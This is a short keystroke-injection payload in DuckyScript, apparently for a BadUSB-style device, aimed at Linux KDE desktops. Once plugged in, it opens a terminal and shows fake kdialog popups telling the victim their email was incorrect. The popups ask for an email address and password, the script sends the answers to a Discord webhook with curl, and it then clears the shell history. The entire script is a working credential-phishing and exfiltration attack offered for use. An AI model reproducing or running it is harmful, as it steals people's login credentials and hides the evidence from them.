* ###########################################################
* #                                                         |
* # Title        : Exfiltrate Email And Password By Phising |
* # Author       : Aleff                                    |
* # Version      : 1.0                                      |
* # Category     : Phishing                                 |
* # Target       : Linux                                    |
* #                                                         |
* ###########################################################

* Requirements:
*     - Internet Connection
*     - Discord webhook
*     - KDE/kdialog based

DELAY 1000
CTRL-ALT t
DELAY 2000


* #### POPUP SECTION ####


* REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
STRING WEBHOOK_URL="WEBHOOK"
ENTER
DELAY 500

* All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(echo $(kdialog --sorry 'Email incorrect.\n Will not connect to server, please retry.'; kdialog --title 'Email \n Put your email address to connect yout account.' --inputbox 'Email:'; kdialog --title 'Email Login' --password 'Email Password:';))\"}" $WEBHOOK_URL); history -c; exit;
ENTER
